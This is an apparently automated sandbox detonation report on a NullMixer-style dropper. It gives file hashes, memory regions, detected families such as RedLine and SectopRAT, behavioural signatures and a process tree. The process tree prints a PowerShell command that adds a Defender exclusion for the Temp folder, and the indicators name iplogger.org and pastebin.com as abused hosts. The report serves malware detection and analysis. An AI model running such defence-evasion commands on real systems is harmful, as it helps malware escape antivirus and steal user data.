| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
memory/2844-63-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2844-72-0x000000006FE40000-0x000000006FFC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat0556e72238ef5897.exe
| MD5 | cd751dfbcb3f9620d31592933fa29dae |
| SHA1 | 7d10974664a2b7ea55ebc831bfac06ec3e1c9815 |
| SHA256 | e8047ab236cbd563304399f11e5e737e6c8b90647ed7f6bbac4ed60c19c5a9c7 |
| SHA512 | e2d74dc14081737f877b86428a1467dc6b79220a1fb7901be55366be2eb488f75cf47a69e620db91f0df91401e72ae00d528c47cc134afbd0da1fbf274af7b6b |
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat05ff081f766eeabb8.exe
| MD5 | 7b3895d03448f659e2934a8f9b0a52ae |
| SHA1 | 084dc9cd061c5fb90bfc17a935d9b6ca8947a33c |
| SHA256 | 898149d20045702c1bf0c4e552a907c763912d4e5d9cf5b348e1aae80928b097 |
| SHA512 | dcc1a140f364d7428fcf3ca85613a911524eb7872ef9076c89a8252fa16cefcdd3fe6d355c857585f8cea8f3e00a43f7ea088c296ecdb3012179db148cc6b25d |
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat05d374c30e.exe
| MD5 | eef74b250b8faefb76f5e5d2f2477fb7 |
| SHA1 | 45efe669d04dd90979c747b5ec0c6bfab5e1f05a |
| SHA256 | 5e0e68e706bae10caa68edc625ad9ada909a277660583e8fbe5681a98170066c |
| SHA512 | c5cea32da6c581ad4377203bdd8685f56419ea47c96b0c552d7a7dcf7313d1ccb66abbd6cb45b9db7e64c7d3b3c1314f15c7e3eca5692943d41d223357ce2584 |
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat0546bbc15e4.exe
| MD5 | b4dd1caa1c9892b5710b653eb1098938 |
| SHA1 | 229e1b7492a6ec38d240927e5b3080dd1efadf4b |
| SHA256 | 6a617cd85f6e4fa3861d97d1f8197e909f6ca895a1c6139171d26068656a4c95 |
| SHA512 | 6285d20d85c2ca38c8dbb92bc8985371cddc9dbe042128e0cc6a48b24e52e5990a196b424a59aa84e551b67c91f5f58894dca2b9c5b130ea78076768e15ecae8 |
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat05ae182be20069e.exe
| MD5 | 449cb511789e9e861193d8c2107d1020 |
| SHA1 | e891b447c93c87d227ffcde5ce6a82b3a423dad7 |
| SHA256 | 46bc001c7806541de50090261435c6e3684b36187b3be11ddb0a4b9e0e381a27 |
| SHA512 | d85d6ca69db7cf431ec5076cc7d0f5e75c14d70efb665cc0b3ab913d0e50deeda9e8192e1d32ed7fda9a2285ee4d8fdbe0afd14fba130a49da0895f65ee6f488 |
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat058b772138cf0f3.exe
| MD5 | fa0bea4d75bf6ff9163c00c666b55e16 |
| SHA1 | eabec72ca0d9ed68983b841b0d08e13f1829d6b5 |
| SHA256 | 0e21c5b0e337ba65979621f2e1150df1c62e0796ffad5fe8377c95a1abf135af |
| SHA512 | 9d9a20024908110e1364d6d1faf9b116adbad484636131f985310be182c13bb21521a73ee083005198e5e383120717562408f86a798951b48f50405d07a9d1a2 |
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat05a28e92796e93d.exe
| MD5 | b7f786e9b13e11ca4f861db44e9fdc68 |
| SHA1 | bcc51246a662c22a7379be4d8388c2b08c3a3248 |
| SHA256 | f8987faadabfe4fd9c473ac277a33b28030a7c2a3ea20effc8b27ae8df32ddf6 |
| SHA512 | 53185e79e9027e87d521aef18488b57b900d3415ee132c3c058ed49c5918dd53a6259463c976928e463ccc1e058d1c9c07e86367538c6bed612ede00c6c0f1a5 |
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat056c52386ee94b16c.exe
| MD5 | e7794f5a37084395732431d9919b63f7 |
| SHA1 | debd5b546598180d1aad7a1ac3487043c3251dc8 |
| SHA256 | 5ded25988670504a175bbd570c1296c0935faeffae656d3c2620849fe487c9dc |
| SHA512 | ffcbd3898b31773064c843df3edd3b249f81b1f221f57fe5a8c071af7ba4fc2f2eb44d130d14e18a63acecac8d0617760c6f9b8529b740072f88afcd3ede1586 |
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat05786a45dda23f71f.exe
| MD5 | 63c74efb44e18bc6a0cf11e4d496ca51 |
| SHA1 | 04a8ed3cf2d1b29b644fbb65fee5a3434376dfa0 |
| SHA256 | be76e36b5b66b15087662720d920e31d1bc718f4ed0861b97f10ef85bfb09f3c |
| SHA512 | 7cba62ff083db883cd172f6104b149bf3cf0b8836407d88093efff8d7bd4bc21ea4f3c951448f1c57b9eb33ca849a86731a2ac4d9c81793456e7ed009e20e402 |
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat053d2789b60d.exe
| MD5 | 118cf2a718ebcf02996fa9ec92966386 |
| SHA1 | f0214ecdcb536fe5cce74f405a698c1f8b2f2325 |
| SHA256 | 7047db11a44cfcd1965dcf6ac77d650f5bb9c4282bf9642614634b09f3dd003d |
| SHA512 | fe5355b6177f81149013c444c244e540d04fbb2bcd2bf3bb3ea9e8c8152c662d667a968a35b24d1310decb1a2db9ac28157cda85e2ef69efee1c9152b0f39089 |
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat053bd2e87da.exe
| MD5 | 09aafd22d1ba00e6592f5c7ea87d403c |
| SHA1 | b4208466b9391b587533fe7973400f6be66422f3 |
| SHA256 | da137a976b0690462ffbe4d94bf04f4e9d972b62d3672bc3b6e69efb9dc004d4 |
| SHA512 | 455189206c764b73f1753f8221a01c6a1f25d530dd5629f503cec1d519a1117666ecf593ba0896e7b72c74681857ce3a5245e35c799be81012532157d0ac74fd |
memory/2028-102-0x0000000000400000-0x000000000042C000-memory.dmp
memory/1616-124-0x0000000000360000-0x0000000000378000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-NKU50.tmp\Sat058b772138cf0f3.tmp
| MD5 | f39995ceebd91e4fb697750746044ac7 |
| SHA1 | 97613ba4b157ed55742e1e03d4c5a9594031cd52 |
| SHA256 | 435fd442eec14e281e47018d4f9e4bbc438ef8179a54e1a838994409b0fe9970 |
| SHA512 | 1bdb43840e274cf443bf1fabd65ff151b6f5c73621cd56f9626360929e7ef4a24a057bce032ac38940eda7c7dca42518a8cb61a7a62cc4b63b26e187a539b4a0 |
memory/2208-126-0x0000000000CB0000-0x0000000000D26000-memory.dmp
memory/2940-125-0x00000000012A0000-0x00000000012A8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat057428ebfd0d.exe
| MD5 | 2788816cd4550345722575b89942f5a1 |
| SHA1 | 0bbc543fc2970415d3a5011b2534f9269ff1d185 |
| SHA256 | 2c35fb66fe7c2035e09001fccf59a36781c10252d80affaf76705c2467cb2161 |
| SHA512 | 9ebf21835e55b1b5a653272f9abffcf146d0a61a484e4f1d9da568d864ae26bfd7bd2a7532d409eb6f6c3fcc5b4d5f1ac5282d4b35390b68bc0e563cfe10f96d |
memory/2844-74-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2844-73-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2844-71-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2844-70-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2844-69-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2844-68-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2844-67-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2844-66-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2844-65-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2844-64-0x000000006494A000-0x000000006494F000-memory.dmp
memory/2972-141-0x0000000002350000-0x0000000002376000-memory.dmp
memory/1616-142-0x00000000001C0000-0x00000000001C6000-memory.dmp
memory/2972-147-0x0000000002560000-0x0000000002584000-memory.dmp
memory/2724-160-0x0000000000D10000-0x0000000000E4B000-memory.dmp
memory/2728-171-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2728-165-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2728-163-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2728-161-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2728-173-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2728-170-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2728-169-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2728-167-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2844-183-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2844-182-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2844-181-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2844-180-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2844-178-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2844-174-0x0000000000400000-0x000000000051C000-memory.dmp
memory/2724-197-0x0000000002E30000-0x0000000002ED5000-memory.dmp
memory/2724-198-0x0000000000C30000-0x0000000000CC2000-memory.dmp
memory/2724-201-0x0000000000C30000-0x0000000000CC2000-memory.dmp
memory/2028-206-0x0000000000400000-0x000000000042C000-memory.dmp
memory/2580-205-0x0000000000400000-0x00000000004D5000-memory.dmp
memory/536-209-0x0000000000400000-0x0000000000871000-memory.dmp
memory/2972-208-0x0000000000400000-0x00000000004C6000-memory.dmp
memory/1012-207-0x0000000000400000-0x000000000088A000-memory.dmp
memory/2724-214-0x0000000000D10000-0x0000000000E4B000-memory.dmp
memory/2724-215-0x0000000000C30000-0x0000000000CC2000-memory.dmp
memory/2724-217-0x0000000000E50000-0x0000000000EDB000-memory.dmp
memory/2724-216-0x0000000002EE0000-0x00000000045D5000-memory.dmp
memory/2724-218-0x00000000045E0000-0x0000000004666000-memory.dmp
memory/292-221-0x0000000002A10000-0x0000000002B4B000-memory.dmp
memory/1012-222-0x0000000000400000-0x000000000088A000-memory.dmp
C:\ProgramData\Garbage Cleaner\Bunifu_UI_v1.5.3.dll
| MD5 | 6445250d234e789c0c2afe69f119e326 |
| SHA1 | 03074f75c0ff50783d8c2e32d96e39b746540f66 |
| SHA256 | 2e6cd9433e66a9ebde268bc6949d4660de441790bd39ffc9cb0f4caaeb44320f |
| SHA512 | ecd094a4d026378f85435f8a2dc16c92c033aff92ba126d8bbb22d6b279b842d417f4df0f63199ea248d0ec64b9679acb5a1f835560d8e3c5b84be492cc0e68e |
memory/1012-250-0x0000000000400000-0x000000000088A000-memory.dmp
memory/292-255-0x0000000002C30000-0x0000000002CD5000-memory.dmp
memory/292-256-0x0000000002DF0000-0x0000000002E82000-memory.dmp
memory/292-259-0x0000000002DF0000-0x0000000002E82000-memory.dmp
memory/292-260-0x0000000002A10000-0x0000000002B4B000-memory.dmp
memory/292-275-0x0000000002DF0000-0x0000000002E82000-memory.dmp
memory/292-276-0x0000000002E90000-0x0000000004585000-memory.dmp
memory/292-277-0x0000000004590000-0x000000000461B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\f77fb5f.exe
| MD5 | 99c8a5f7c87b4ec0ac66592a85e129f5 |
| SHA1 | 3699ef050962cfa6e3d6440a941396c9f022ea52 |
| SHA256 | 899c95d880933fc5a12f409c8e7821148ef0f9b4a28c226cb9cc6f44caacdbad |
| SHA512 | a3af8e0340d85cc0d83ed0824c98ff1de2aba7d73299ce47ab136df40c44ed34acd5e06d80d22a61b2963bd6c5586d80d446b205aa1e9ddad27b3ba4396b1b18 |
memory/3052-312-0x00000000009C0000-0x00000000009C8000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-08 00:10
Reported
2024-11-08 00:13
Platform
win10v2004-20241007-en
Max time kernel
82s
Max time network
151s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\9265b09595c59007e116c60605c28bd616387cf0dff79c7db8c5880e23cfef8e.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat0546bbc15e4.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat0556e72238ef5897.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-1MLFE.tmp\Sat058b772138cf0f3.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Reads user/profile data of web browsers
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat05ae182be20069e.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1692 set thread context of 936 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat053bd2e87da.exe | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat053bd2e87da.exe |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat0546bbc15e4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat053bd2e87da.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\9265b09595c59007e116c60605c28bd616387cf0dff79c7db8c5880e23cfef8e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat0556e72238ef5897.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\control.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat053d2789b60d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\e589555.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat058b772138cf0f3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat056c52386ee94b16c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-1MLFE.tmp\Sat058b772138cf0f3.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat05ae182be20069e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat05786a45dda23f71f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat05ff081f766eeabb8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat053bd2e87da.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat056c52386ee94b16c.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat056c52386ee94b16c.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat056c52386ee94b16c.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133754982874254407" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\9265b09595c59007e116c60605c28bd616387cf0dff79c7db8c5880e23cfef8e.exe
"C:\Users\Admin\AppData\Local\Temp\9265b09595c59007e116c60605c28bd616387cf0dff79c7db8c5880e23cfef8e.exe"
C:\Users\Admin\AppData\Local\Temp\7zS4F803977\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4F803977\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat057428ebfd0d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat053d2789b60d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat053bd2e87da.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat05786a45dda23f71f.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0556e72238ef5897.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat056c52386ee94b16c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat05a28e92796e93d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat05d374c30e.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat05ff081f766eeabb8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat05ae182be20069e.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat058b772138cf0f3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0546bbc15e4.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2636 -ip 2636
